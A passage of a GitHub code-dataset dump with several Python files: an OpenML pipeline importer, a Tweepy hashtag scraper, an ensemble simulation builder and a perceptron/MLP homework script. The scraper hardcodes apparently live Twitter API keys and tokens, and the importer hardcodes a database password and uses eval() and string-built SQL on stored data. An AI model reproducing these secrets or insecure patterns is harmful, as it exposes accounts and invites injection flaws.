fill=\"white\")\ntext_4 = canvas.text(200, 470, text=\"4: \", fill=\"white\")\ntext_5 = canvas.text(200, 490, text=\"5: \", fill=\"white\")\ntext_6 = canvas.text(200, 510, text=\"6: \", fill=\"white\")\n\ninput_loop = Entry(root)\ninput_loop.grid()\npocet_loopov = canvas.create_window(200, 10, width=100, window=input_loop)\n\nenter_button = Button(root, text=\"potvrdenie\", command=potvrdenie)\nenter_button.grid()\ntlacitko = canvas.create_window(200, 35, width=100, window=enter_button)\n\nroot.mainloop()\n","repo_name":"Cupprum/MATURITA_INFO","sub_path":"RIESENIA/app1_2.py","file_name":"app1_2.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16841028697","text":"import time\nfrom datetime import datetime\nfrom typing import Dict, List, Any, Tuple, Callable\n\nfrom numpy import nan\nimport numpy as np\nimport openml\nimport pandas as pd\nfrom ConfigSpace.configuration_space import Configuration\nfrom sklearn.base import is_classifier\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.engine.url import URL\n\nfrom config import DatasetConfig\nfrom constants import AlgorithmStatus\nfrom core import Core\nfrom database import Database, Algorithm\nfrom methods import ALGORITHMS\n\nmapping = {\n 'sklearn.ensemble.forest.RandomForestClassifier': 'random_forest',\n 'sklearn.feature_selection.variance_threshold.VarianceThreshold': 'variance_threshold',\n 'sklearn.ensemble._forest.RandomForestClassifier': 'random_forest',\n 'sklearn.decomposition.pca.PCA': 'pca',\n 'sklearn.ensemble.forest.ExtraTreesClassifier': 'extra_trees',\n 'sklearn.tree._classes.ExtraTreesClassifier': 'extra_trees',\n # 'sklearn.ensemble.gradient_boosting.GradientBoostingClassifier': None,\n 'sklearn.preprocessing.data.Binarizer': 'binarizer',\n 'sklearn.tree.tree.DecisionTreeClassifier': 'decision_tree',\n 'sklearn.tree._classes.DecisionTreeClassifier': 'decision_tree',\n 'sklearn.discriminant_analysis.LinearDiscriminantAnalysis': 'linear_discriminant_analysis',\n 'sklearn.ensemble._hist_gradient_boosting.gradient_boosting.HistGradientBoostingClassifier': 'gradient_boosting',\n 'sklearn.ensemble._weight_boosting.AdaBoostClassifier': 'ada_boosting',\n 'sklearn.ensemble.weight_boosting.AdaBoostClassifier': 'ada_boosting',\n 'sklearn.feature_selection.univariate_selection.SelectKBest': 'select_k_best',\n 'sklearn.preprocessing.data.StandardScaler': 'standard_scaler',\n 'sklearn.preprocessing._data.StandardScaler': 'standard_scaler',\n 'sklearn.naive_bayes.GaussianNB': 'gaussian_nb',\n 'sklearn.svm.classes.SVC': 'libsvm_svc',\n 'sklearn.svm._classes.SVC': 'libsvm_svc',\n 'sklearn.impute.SimpleImputer': 'imputation',\n 'sklearn.impute._base.SimpleImputer': 'imputation',\n 'sklearn.discriminant_analysis.QuadraticDiscriminantAnalysis': 'qda',\n 'sklearn.linear_model.logistic.LogisticRegression': 'logistic_regression',\n 'sklearn.linear_model._logistic.LogisticRegression': 'logistic_regression',\n 'sklearn.naive_bayes.MultinomialNB': 'multinomial_nb',\n 'sklearn.naive_bayes.BernoulliNB': 'bernoulli_nb',\n 'sklearn.neighbors.classification.KNeighborsClassifier': 'k_neighbors',\n 'sklearn.neighbors._classification.KNeighborsClassifier': 'k_neighbors',\n 'sklearn.preprocessing.data.OneHotEncoder': 'one_hot_encoding',\n 'sklearn.preprocessing._encoders.OneHotEncoder': 'one_hot_encoding',\n 'sklearn.preprocessing.data.MinMaxScaler': 'minmax',\n 'sklearn.cluster.hierarchical.FeatureAgglomeration': 'feature_agglomeration',\n 'sklearn.linear_model._stochastic_gradient.SGDClassifier': 'sgd',\n 'sklearn.neural_network.multilayer_perceptron.MLPClassifier': 'mlp_classifier',\n 'sklearn.preprocessing.data.RobustScaler': 'robust_scaler',\n 'sklearn.preprocessing.data.PolynomialFeatures': 'polynomial'\n}\n\n\ndef get_dataset(id):\n ds = openml.datasets.get_dataset(int(eval(id)))\n X, y, categorical_indicator, attribute_names = ds.get_data(\n dataset_format='dataframe',\n target=ds.default_target_attribute\n )\n if ds.qualities['NumberOfMissingValues'] > 100000 or X.shape[1] > 500000:\n return None, None, None\n dataset_conf = DatasetConfig({'openml': id, 'train_path': None})\n dataset_conf.format = ds.format\n dataset_conf.class_column = ds.default_target_attribute\n dataset_conf.name = '{}_{}_{}'.format(ds.name, int(eval(id)), time.time())\n return X, y, dataset_conf\n\n\ndef delete_hp(names: List[str], hp: Dict[str, Any]):\n for name in names:\n if name in hp:\n del hp[name]\n return hp\n\n\ndef convert_hp(types: List[Tuple[str, Callable]], hp: Dict[str, Any]):\n for name, func in types:\n if name in hp:\n hp[name] = func(hp[name])\n return hp\n\n\ndef init_component(hp):\n hp = hp.replace('true', True)\n hp = hp.replace('false', False)\n for key in hp.keys():\n try:\n if isinstance(hp[key], str):\n hp[key] = float(hyperparameter[key])\n else:\n hp[key] = hyperparameter[key]\n if hp[key] == 'True':\n hp[key] = True\n elif hp[key] == 'False':\n hp[key] = False\n except:\n hp[key] = hyperparameter[key]\n return hp\n\n\ndef init_preprocessor(X, y, component, hp):\n hp = init_component(hp)\n hp = delete_hp(['copy', 'verbose', 'random_state', 'memory', 'cache_size'], hp)\n\n if component.name().endswith('ImputationComponent'):\n hp = delete_hp(['fill_value', 'missing_values'], hp)\n\n if component.name().endswith('PCAComponent'):\n if 'svd_solver' in hp and hp['svd_solver'] == 'auto':\n if max(*X.shape) > 500000:\n hp['svd_solver'] = 'full'\n del hp['iterated_power']\n else:\n hp['svd_solver'] = 'randomized'\n elif ('n_components' in hp and hp['n_components'] is None) or (\n 'n_components' in hp and hp['n_components'] == 'null') or (\n 'n_components' in hp and hp['n_components'] == 'None'):\n hp['keep_variance'] = 1.0\n if 'n_components' in hp and isinstance(hp['n_components'], float):\n hp['keep_variance'] = hp['n_components'] / min(*X.shape)\n if 'iterated_power' in hp and hp['iterated_power'] == 'auto':\n if 'keep_variance' in hp and hp['keep_variance'] < (0.1 * min(*X.shape)):\n hp['iterated_power'] = 4\n else:\n hp['iterated_power'] = 7\n hp = delete_hp(['n_components'], hp)\n\n if component.name().endswith('BinarizerComponent'):\n if 'threshold' in hp:\n hp['threshold_factor'] = hp['threshold'] / np.mean(X.var())\n del hp['threshold']\n\n if component.name().endswith('SelectKBestComponent'):\n if 'k' in hp:\n hp['k_factor'] = hp['k'] / X.shape[1]\n del hp['k']\n if 'score_func' in hp and 'f_regression' in hp['score_func']:\n hp['score_func'] = 'f_regression'\n if 'score_func' in hp and 'f_classif' in hp['score_func']:\n hp['score_func'] = 'f_classif'\n if 'score_func' in hp and 'mutual_info' in hp['score_func']:\n hp['score_func'] = 'mutual_info'\n if 'score_func' in hp and 'chi2' in hp['score_func']:\n hp['score_func'] = 'chi2'\n\n if component.name().endswith('FeatureAgglomerationComponent'):\n if 'compute_full_tree' in hp and hp['compute_full_tree'] == 'auto':\n hp['compute_full_tree'] = False\n if 'pooling_func' in hp and 'mean' in hp['pooling_func']:\n hp['pooling_func'] = 'mean'\n if 'pooling_func' in hp and 'median' in hp['pooling_func']:\n hp['pooling_func'] = 'median'\n if 'pooling_func' in hp and 'max' in hp['pooling_func']:\n hp['pooling_func'] = 'max'\n if 'n_clusters' in hp:\n hp['n_clusters_factor'] = hp['n_clusters'] / X.shape[1]\n hp = delete_hp(['connectivity', 'n_clusters'], hp)\n\n if component.name().endswith('OneHotEncoderComponent'):\n return algorithm.get_hyperparameter_search_space().get_default_configuration()\n\n cs = algorithm.get_hyperparameter_search_space()\n default = cs.get_default_configuration()\n default = default.get_dictionary()\n for key in hp.keys():\n try:\n if isinstance(hp[key], str):\n default[key] = float(hp[key])\n else:\n default[key] = hp[key]\n except:\n default[key] = hp[key]\n\n default = convert_hp([\n ('max_bins', int),\n ('with_mean', bool),\n ('with_std', bool),\n ('whiten', bool),\n ('add_indicator', bool),\n ('probability', bool),\n ('degree', int),\n ('iterated_power', int)\n ], default)\n\n if 'iterated_power' in default and 'solver' in default and default['solver'] != 'randomized':\n del default['iterated_power']\n if 'distance_threshold' in default and 'distance_threshold' not in hp:\n del default['distance_threshold']\n config = None\n try:\n config = Configuration(cs, default)\n except ValueError as v:\n print(v)\n\n return config\n\n\ndef init_classifier(X, y, component, hp):\n hp = init_component(hp)\n\n if component.name().endswith('RandomForest') or component.name().endswith(\n 'ExtraTreesClassifier') or component.name().endswith('DecisionTree'):\n if 'n_estimators' in hp and hp['n_estimators'] == 'warn':\n hp['n_estimators'] = 10\n elif 'max_depth' in hp and hp['max_depth'] is not None and not isinstance(hp['max_depth'], str):\n hp['max_depth_factor'] = (hp['max_depth'] / X.shape[1])\n if 'max_leaf_nodes' in hp and hp['max_leaf_nodes'] is not None and not isinstance(hp['max_leaf_nodes'], str):\n hp['max_leaf_nodes_factor'] = (hp['max_leaf_nodes'] / X.shape[0])\n if 'min_samples_leaf' in hp and hp['min_samples_leaf'] is not None and not isinstance(hp['min_samples_leaf'],str):\n hp['min_samples_leaf'] = (hp['min_samples_leaf'] / X.shape[0])\n if 'max_features' in hp and hp['max_features'] == 'null' or np.isnan(hp['max_features']):\n hp['max_features'] = 1.0\n if 'max_features' in hp and hp['max_features'] is not None and not isinstance(hp['max_features'], str):\n hp['max_features'] = (hp['max_features'] / X.shape[1])\n if component.name().endswith('ExtraTreesClassifier') and 'oob_score' in hp:\n del hp['oob_score']\n elif 'max_features' in hp and hp['max_features'] is not None and isinstance(hp['max_features'], str):\n if hp['max_features'] == 'auto' or hp['max_features'] == 'sqrt':\n hp['max_features'] = np.sqrt(X.shape[1]) / X.shape[1]\n elif hp['max_features'] == 'log2':\n hp['max_features'] = np.log2(X.shape[1]) / X.shape[1]\n if 'min_samples_split' in hp and hp['min_samples_split'] is not None and not isinstance(hp['min_samples_split'],\n str):\n hp['min_samples_split'] = (hp['min_samples_split'] / X.shape[0])\n if 'min_impurity_split' in hp:\n del hp['min_impurity_split']\n if 'presort' in hp:\n del hp['presort']\n if 'min_impurity_split' in hp:\n del hp['min_impurity_split']\n\n if component.name().endswith('GradientBoostingClassifier'):\n if 'max_leaf_nodes' in hp and hp['max_leaf_nodes'] is not None and not isinstance(hp['max_leaf_nodes'], str):\n hp['max_leaf_nodes_factor'] = (hp['max_leaf_nodes'] / X.shape[0])\n if 'max_depth' in hp and hp['max_depth'] is not None and not isinstance(hp['max_depth'], str):\n hp['max_depth_factor'] = (hp['max_depth'] / X.shape[1])\n del hp['max_depth']\n if 'min_samples_leaf' in hp and hp['min_samples_leaf'] is not None and not isinstance(hp['min_samples_leaf'], str):\n hp['min_samples_leaf'] = (hp['min_samples_leaf'] / X.shape[0])\n if 'max_bins' in hp and hp['max_bins'] == 256:\n hp['max_bins'] = 255\n if 'scoring' in hp and hp['scoring'] == 'null':\n hp['scoring'] = 'accuracy'\n if 'n_iter_no_change' in hp and hp['n_iter_no_change'] == 'null':\n hp['n_iter_no_change'] = 0\n\n if component.name().endswith('LibSVM_SVC'):\n if 'max_iter' in hp:\n del hp['max_iter']\n if 'gamma' in hp and isinstance(hp['gamma'], str) and hp['gamma'] == 'auto':\n hp['gamma'] = 1 / X.shape[1]\n if 'gamma' in hp and isinstance(hp['gamma'], str) and hp['gamma'] == 'scale':\n hp['gamma'] = 1 / (X.shape[1] * np.mean(X.var()))\n if 'decision_function_shape' in hp and hp['decision_function_shape'] is None:\n hp['decision_function_shape'] = 'ovo'\n if 'decision_function_shape' in hp and hp['decision_function_shape'] is 'None':\n hp['decision_function_shape'] = 'ovo'\n if 'kernel' in hp and hp['kernel'] == 'poly':\n if 'coef0' not in hp:\n hp['coef0'] = 0.\n if 'degree' not in hp:\n hp['degree'] = 2\n if 'gamma' not in hp:\n hp['gamma'] = 0.1\n if 'kernel' in hp and hp['kernel'] == 'sigmoid':\n if 'coef0' not in hp:\n hp['coef0'] = 0.\n if 'gamma' not in hp:\n hp['gamma'] = 0.1\n if 'kernel' in hp and hp['kernel'] == 'rbf':\n if 'gamma' not in hp:\n hp['gamma'] = 0.1\n\n if component.name().endswith('MultinomialNB') or component.name().endswith('BernoulliNB'):\n if 'class_prior' in hp:\n del hp['class_prior']\n if 'binarize' in hp:\n del hp['binarize']\n\n if component.name().endswith('SGDClassifier'):\n if 'n_iter_no_change' in hp:\n del hp['n_iter_no_change']\n\n if component.name().endswith('LinearDiscriminantAnalysis'):\n if 'n_components' in hp and np.isnan(hp['n_components']):\n hp['n_components'] = min(len(y.unique()) - 1, X.shape[1])\n if 'shrinkage' in hp and np.isnan(hp['shrinkage']):\n hp['shrinkage'] = 0.0\n if 'priors' in hp:\n del hp['priors']\n if 'store_covariance' in hp:\n del hp['store_covariance']\n\n if component.name().endswith('GaussianNB'):\n if 'priors' in hp:\n del hp['priors']\n\n if component.name().endswith('LogisticRegression'):\n if 'multi_class' in hp and hp['multi_class'] == 'auto':\n if len(y.unique()) == 2 or hp['solver'] == 'liblinear':\n hp['multi_class'] = 'ovr'\n else:\n hp['multi_class'] = 'multinomial'\n elif 'multi_class' in hp and hp['multi_class'] == 'warn':\n hp['multi_class'] = 'ovr'\n if 'solver' in hp and hp['solver'] == 'warn':\n hp['solver'] = 'liblinear'\n if 'l1_ratio' in hp and 'penalty' in hp and hp['penalty'] != 'elasticnet':\n del hp['l1_ratio']\n\n if component.name().endswith('MLPClassifier'):\n if 'batch_size' in hp:\n del hp['batch_size']\n if 'hidden_layer_sizes' in hp:\n hp['layer_1_size'] = hp['hidden_layer_sizes'][1]\n hp['layer_2_size'] = hp['hidden_layer_sizes'][1]\n del hp['hidden_layer_sizes']\n\n if component.name().endswith('QuadraticDiscriminantAnalysis'):\n if 'store_covariances' in hp:\n del hp['store_covariances']\n if 'priors' in hp:\n del hp['priors']\n\n if component.name().endswith('KNeighborsClassifier'):\n if 'metric_params' in hp:\n del hp['metric_params']\n\n hp = delete_hp(['copy', 'verbose', 'random_state', 'memory', 'cache_size', 'max_depth', 'max_leaf_nodes', 'n_jobs',\n 'warm_start', 'class_weight'], hp)\n\n cs = algorithm.get_hyperparameter_search_space()\n default = cs.get_default_configuration()\n default = default.get_dictionary()\n for key in hp.keys():\n try:\n if isinstance(hp[key], str):\n default[key] = float(hp[key])\n else:\n default[key] = hp[key]\n except:\n default[key] = hp[key]\n if 'bootstrap' in default and 'oob_score' in default and default['bootstrap'] is False:\n del default['oob_score']\n if 'degree' in default and 'kernel' in default and default['kernel'] != 'poly':\n del default['degree']\n if 'coef0' in default and 'kernel' in default and default['kernel'] not in ['poly', 'sigmoid']:\n del default['coef0']\n if 'gamma' in default and 'kernel' in default and default['kernel'] not in ['poly', 'sigmoid', 'rbf']:\n del default['gamma']\n if 'shrinkage' in default and 'solver' in default and default['solver'] not in [\"lsqr\", \"eigen\"]:\n del default['shrinkage']\n if 'dual' in default and 'penalty' in default and default['penalty'] != 'l2' and 'solver' in default and default['solver'] != 'liblinear':\n del default['dual']\n if 'dual' in default and 'solver' in default and default['solver'] != 'liblinear':\n del default['dual']\n if 'learning_rate_init' in default and 'solver' in default and default['solver'] not in [\"sgd\", \"adam\"]:\n del default['learning_rate_init']\n if 'power_t' in default and 'solver' in default and default['solver'] not in [\"sgd\"]:\n del default['power_t']\n if 'power_t' in default and 'learning_rate' in default and default['learning_rate'] not in [\"invscaling\"]:\n del default['power_t']\n if 'momentum' in default and 'solver' in default and default['solver'] not in [\"sgd\"]:\n del default['momentum']\n if 'nesterovs_momentum' in default and 'momentum' in default and default['momentum'] != 0.0:\n del default['nesterovs_momentum']\n if 'nesterovs_momentum' in default and 'solver' in default and default['solver'] != 'sgd':\n del default['nesterovs_momentum']\n if 'early_stopping' in default and 'solver' in default and default['solver'] not in [\"sgd\", \"adam\"]:\n del default['early_stopping']\n if 'validation_fraction' in default and 'early_stopping' in default and default['early_stopping'] is True:\n del default['validation_fraction']\n if 'beta_1' in default and 'solver' in default and default['solver'] not in [\"adam\"]:\n del default['beta_1']\n if 'beta_2' in default and 'solver' in default and default['solver'] not in [\"adam\"]:\n del default['beta_2']\n if 'epsilon' in default and 'solver' in default and default['solver'] not in [\"adam\"]:\n del default['epsilon']\n if 'n_iter_no_change' in default and 'solver' in default and default['solver'] not in [\"sgd\", \"adam\"]:\n del default['n_iter_no_change']\n\n default = convert_hp([('max_iter', int),\n ('n_estimators', int),\n ('leaf_size', int),\n ('layer_1_size', int),\n ('layer_2_size', int),\n ('max_bins', int),\n ('n_neighbors', int),\n ('probability', bool),\n ('fit_intercept', bool),\n ('shrinking', bool),\n ('shuffle', bool),\n ('dual', bool),\n ('add_indicator', bool),\n ('bootstrap', bool),\n ('early_stopping', bool),\n ('oob_score', bool),\n ('degree', int),\n ('p', int)\n ], default)\n return Configuration(cs, default)\n\n\ncore = Core(work_dir='data/')\ndatabase = Database('sqlite', 'assets/ml-base.db', None, None, None, None, None)\nengine = create_engine('postgresql://admin:admin123@127.0.0.1:5432/openml_data')\ndaten = pd.read_sql(sql='''select * from data where \"0.name\" = 'sklearn.impute._base.SimpleImputer';''', con=engine)\nfor index, pipeline in daten.iterrows():\n length = 0\n step = '{}.name'.format(length)\n abort = False\n while step in pipeline and pipeline[step] is not None:\n if pipeline[step] not in mapping.keys():\n abort = True\n break\n length += 1\n step = '{}.name'.format(length)\n\n if abort:\n print('Unknown algorithm {}'.format(pipeline[step]))\n continue\n\n try:\n dataset = pipeline['dataset']\n X, y, dataset_conf = get_dataset(dataset)\n if dataset_conf is None:\n continue\n df = pd.concat([X, y], axis=1)\n dataset_id = core.add_dataset(df, dataset_conf.class_column, depth=0, name=dataset_conf.name).id\n except Exception as e:\n print(e)\n dataset = -1\n continue\n\n created_ids = []\n for step in range(length):\n try:\n algorithm_name = mapping[pipeline[str(step) + '.name']]\n algorithm = ALGORITHMS[algorithm_name]()\n hyperparameter = pd.Series(eval(pipeline[str(step) + '.hyperparameter']))\n if is_classifier(algorithm):\n config = init_classifier(X, y, algorithm, hyperparameter)\n else:\n config = init_preprocessor(X, y, algorithm, hyperparameter)\n\n algorithm_id = database.create_algorithm(dataset_id,\n Algorithm(algorithm_name, input_dataset=dataset_id,\n status=AlgorithmStatus.COMPLETE,\n output_dataset=None,\n start_time=datetime.now(), end_time=datetime.now(),\n hyperparameter_values=config, host='openML')).id\n created_ids.append(str(algorithm_id))\n\n if is_classifier(algorithm):\n database.complete_algorithm(algorithm_id, None,\n accuracy=pipeline['predictive_accuracy'],\n f1=pipeline['f_measure'],\n precision=pipeline['precision'],\n roc_auc=pipeline['area_under_roc_curve'],\n recall=pipeline['weighted_recall'])\n # TODO check if classifier can be in middle of pipeline\n if step != length - 1:\n raise ValueError('Detected classifier in the middle of the pipeline')\n\n else:\n if hasattr(algorithm, 'fit_transform'):\n X = algorithm.fit_transform(pd.DataFrame(X), pd.Series(y))\n else:\n X = algorithm.fit(pd.DataFrame(X), pd.Series(y)).transform(pd.DataFrame(X))\n X = pd.DataFrame(data=X, index=range(X.shape[0]), columns=range(X.shape[1]))\n df = pd.concat([X, y], axis=1)\n dataset_id = core.add_dataset(df, dataset_conf.class_column, depth=0, budget=0).id\n database.complete_algorithm(algorithm_id, dataset_id)\n except Exception as e:\n print('{}: {}'.format(pipeline['index'], e))\n print('deleting ids: ' + str(created_ids))\n db_url = URL(drivername='sqlite', database='assets/ml-base.db', username=None, password=None, host=None,\n port=None, query=None)\n engine_to_delete = create_engine(db_url, pool_pre_ping=True, pool_recycle=3600,\n connect_args={\"check_same_thread\": False})\n engine_to_delete.execute(\n 'delete from main.algorithms where main.algorithms.id in ({})'.format(', '.join(created_ids)))\n engine_to_delete.dispose()\n break\n","repo_name":"Ennosigaeon/meta-learning-base","sub_path":"scripts/openml_transformer.py","file_name":"openml_transformer.py","file_ext":"py","file_size_in_byte":23199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18067690068","text":"import tweepy\nimport csv\nimport pandas as pd\nimport sys\n\n####input your credentials here\nconsumer_key = '32kPBCxkpRdjftbA2aNIPz41b'\nconsumer_secret = 'YmfYen0Brw8FvUQMHZwNAfFXfopgTECti7nsq42KDXmIKzCxvg'\naccess_token = '748180615669891072-ofAuXoBlstCSlmMbYhtobGLNXfLchY4'\naccess_token_secret = 'qiyq0WzOjuG8tuhGggaF2tr3dLhfUYkJ0LJHs2zF54C4u'\n\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\n\n\ndef collect_tweets(hastag):\n csv_file = open('./collected_tweets/{}.csv'.format(hastag), 'a')\n csv_writer = csv.writer(csv_file)\n\n num_collected = 0\n for tweet in tweepy.Cursor(api.search,q=\"#{}\".format(hastag),count=200,lang=\"en\").items():\n # print(tweet.created_at, tweet.text)\n csv_writer.writerow([tweet.created_at, tweet.text.encode('utf-8')])\n num_collected = num_collected + 1\n print(num_collected)\n\nhastag = sys.argv[1]\ncollect_tweets(\"{}\".format(hastag))","repo_name":"Prashant047/info-diffusion-in-social-net","sub_path":"tweet_extractor_hastag.py","file_name":"tweet_extractor_hastag.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"75120189904","text":"#!usr/bin/python\n\n\nfrom utils import deck_parser as dp\nfrom datetime import datetime\nimport utils.utilities as u\nimport sys\nimport os\nfrom tqdm import tqdm\n\nfrom pathlib import Path\n\nSTORAGE_DIR = './simulations/storage/'\nSTUDIES_DIR = './simulations/studies/'\nPath(STORAGE_DIR).mkdir(parents=True, exist_ok=True)\nPath(STUDIES_DIR).mkdir(parents=True, exist_ok=True)\n\ndef mutate_case(root_datafile_path, real_datafile_path, parameters, case_number):\n\n with open(root_datafile_path, 'r') as file :\n filedata = file.read()\n\n # parameters\n for param in tqdm(parameters, total=len(parameters), leave=True, desc=\"Populating properties: \"):\n \n Name = param[\"Name\"]\n Type = param[\"Type\"]\n d = param[\"Distribution\"]\n \n if Type == \"SingleValue\":\n replaced_value = u.replace_single_value(d)\n elif Type == \"RandomField\":\n replaced_value = u.replace_random_field(d)\n elif Type == \"FixedFile\":\n replaced_value = u.replace_fixed_value(d, case_number)\n else:\n raise NotImplementedError(f\"Distribution type {Type} is not recognized.\")\n \n filedata = filedata.replace(Name, replaced_value)\n\n # Write the file out again\n with open(real_datafile_path, 'w') as file:\n file.write(filedata)\n\n\ndef mutate_cases(data, root_datafile_path):\n\n _, tail = os.path.split(root_datafile_path) # dir_path = /path/to/data\n root_name = os.path.splitext(tail)[0] #root_name = SPE1\n\n base_ens_path = os.path.join(STORAGE_DIR, 'BASE_' + data['Name'])\n Path(base_ens_path).mkdir(parents=True, exist_ok=True)\n\n real_files = {}\n for i in tqdm(range(1, data['Ne']+1), total=data['Ne'], desc=\"Case: \"):\n real_name = root_name + '_%s'%i # SPE1_i\n \n real_path = os.path.join(base_ens_path, real_name) # /path/to/data/SPE1_i\n Path(real_path).mkdir(parents=True, exist_ok=True)\n\n real_datafile_path = os.path.join(real_path, real_name + '.DATA') # /path/to/data/SPE1_i/SPE1_i.DATA\n \n mutate_case(root_datafile_path, real_datafile_path, data['parameters'], i)\n\n real_files[real_name] = real_datafile_path\n\n return real_files\n\ndef dump_ensemble(data, real_files, root_datafile_path, json_path):\n\n ensemble_study = os.path.join(STUDIES_DIR, '%s.json' %data['Name'])\n\n # current date and time\n now = datetime.now()\n\n timestamp = datetime.timestamp(now)\n dt_object = str(datetime.fromtimestamp(timestamp))\n\n ens_path = os.path.join(STORAGE_DIR, 'BASE_' + data['Name'])\n \n study = {'status':\"created\",\n 'Name': data['Name'],\n 'creation': {\n 'root': root_datafile_path,\n 'json': json_path,\n 'timestamp': dt_object,\n 'base_realizations': real_files,\n 'storage': ens_path} \n }\n \n u.save_to_json(ensemble_study, study)\n\ndef main(argv):\n\n # root_datafile_path = argv[0] # root_path to the data file e.g. /path/to/data/SPE1.DATA\n json_path = argv[0] # path to the json file e.g. /path/to/json/SPE1.json\n \n if not os.path.isfile(json_path):\n raise ValueError(\"%s cannot be found\" %json_path)\n \n config = u.read_json(json_path)\n \n root_datafile_path = config[\"root\"]\n if not os.path.isfile(root_datafile_path):\n raise ValueError(\"%s cannot be found\" %root_datafile_path)\n\n data = u.read_json(json_path)\n real_files = mutate_cases(data, root_datafile_path)\n\n dump_ensemble(data, real_files, root_datafile_path, json_path)\n \nif __name__ == \"__main__\":\n \"\"\"The arguments are the following:\n 1. json path (str): path to the .json file that explains the uncertainties in the model \n \n Ex: \"python3 src/create_ensemble.py data/SPE1_Ensemble/SPE1_Poro.json\"\n \"\"\"\n\n main(sys.argv[1:])","repo_name":"iffanh/petlab","sub_path":"src/create_ensemble.py","file_name":"create_ensemble.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2393584683","text":"#-------------------------------------------------------------------------\n# AUTHOR: Irfan Iqbal\n# FILENAME: perception\n# SPECIFICATION: training a perceptron with differnt learning rates to find the best one\n# FOR: CS 4210- Assignment #4\n# TIME SPENT: 20 min\n#-----------------------------------------------------------*/\n\n#IMPORTANT NOTE: YOU HAVE TO WORK WITH THE PYTHON LIBRARIES numpy AND pandas to complete this code.\n\n#importing some Python libraries\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.neural_network import MLPClassifier #pip install scikit-learn==0.18.rc2 if needed\nimport numpy as np\nimport pandas as pd\n\nn = [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1.0]\nr = [True, False]\n\ndf = pd.read_csv('optdigits.tra', sep=',', header=None) #reading the data by using Pandas library\n\nX_training = np.array(df.values)[:,:64] #getting the first 64 fields to form the feature data for training\ny_training = np.array(df.values)[:,-1] #getting the last field to form the class label for training\n\ndf = pd.read_csv('optdigits.tes', sep=',', header=None) #reading the data by using Pandas library\n\nX_test = np.array(df.values)[:,:64] #getting the first 64 fields to form the feature data for test\ny_test = np.array(df.values)[:,-1] #getting the last field to form the class label for test\n\nmaxP,maxMLP=0,0\n\nfor i in n: #iterates over n\n\n for j in r: #iterates over r\n\n #iterates over both algorithms\n #-->add your Pyhton code here\n alg=[Perceptron, MLPClassifier]\n\n for a in alg: #iterates over the algorithms\n\n #Create a Neural Network classifier\n #if Perceptron then\n # clf = Perceptron() #use those hyperparameters: eta0 = learning rate, shuffle = shuffle the training data, max_iter=1000\n #else:\n # clf = MLPClassifier() #use those hyperparameters: activation='logistic', learning_rate_init = learning rate, hidden_layer_sizes = number of neurons in the ith hidden layer,\n # shuffle = shuffle the training data, max_iter=1000\n #-->add your Pyhton code here\n\n if a==Perceptron:\n clf=Perceptron(eta0=i,shuffle=j,max_iter=1000)\n else:\n clf=MLPClassifier(activation='logistic',learning_rate_init=i,hidden_layer_sizes=100,shuffle=j)\n\n #Fit the Neural Network to the training data\n clf.fit(X_training, y_training)\n\n #make the classifier prediction for each test sample and start computing its accuracy\n #hint: to iterate over two collections simultaneously with zip() Example:\n #for (x_testSample, y_testSample) in zip(X_test, y_test):\n #to make a prediction do: clf.predict([x_testSample])\n #--> add your Python code here\n accuracy=0\n for (X_testSample,y_testSample) in zip(X_test,y_test):\n if clf.predict([X_testSample])==y_testSample:\n accuracy+=1\n accuracy/=len(X_test)\n\n #check if the calculated accuracy is higher than the previously one calculated for each classifier. If so, update the highest accuracy\n #and print it together with the network hyperparameters\n #Example: \"Highest Perceptron accuracy so far: 0.88, Parameters: learning rate=0.01, shuffle=True\"\n #Example: \"Highest MLP accuracy so far: 0.90, Parameters: learning rate=0.02, shuffle=False\"\n #--> add your Python code here\n\n if a==Perceptron and accuracy>maxP:\n maxP=accuracy\n print(\"Highest Perceptron accuracy so far: \"+ str(round(accuracy,3))+\" Parameters: learning rate=\"+str(i)+\", shuffle=\"+str(j))\n\n elif accuracy > maxMLP:\n maxMLP = accuracy\n print(\"Highest MLP accuracy so far: \" + str(round(accuracy, 3)) + \" Parameters: learning rate=\" + str(i) + \", shuffle=\" + str(j))\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"irfan61802/CS-4210-Assignment-4","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39273565319","text":"from django.urls import path\nfrom frontend import views\n\napp_name = 'frontend'\n\nurlpatterns = [\n path('about-page/', views.about, name='about'),\n path('phones-page/', views.phones, name='phones'),\n path('laptops-page/', views.laptops, name='laptops'),\n path('shirts-page/', views.shirts, name='shirts'),\n path('screens-page/', views.screens, name='screens'),\n path('contact-page/', views.contact, name='contact'),\n]\n","repo_name":"Tijae007/EcommerceMockup","sub_path":"frontend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41895648343","text":"from .netdev import NetDev\nfrom .topology import TopologyMember\n\n\nclass Veth(TopologyMember):\n REF = 'veth'\n DESC = {'title': 'Virtual Ethernet (Veth) with IPv4 addresses'}\n SCHEMA = {\n 'type': 'object',\n 'additionalProperties': False,\n 'required': ['name', 'dev1', 'dev2'],\n 'properties': {\n 'name': {'type': 'string'},\n 'dev1': NetDev.SCHEMA,\n 'dev2': NetDev.SCHEMA\n }\n }\n\n def __init__(self, topology, name, ns1, ns2, dev1_args=None,\n dev2_args=None):\n super().__init__(topology, name)\n dev1_args = dev1_args or {}\n dev2_args = dev2_args or {}\n self.dev1 = NetDev(topology=topology, alias=f'{name}.dev1',\n owner=self, ns=ns1, **dev1_args)\n self.dev2 = NetDev(topology=topology, 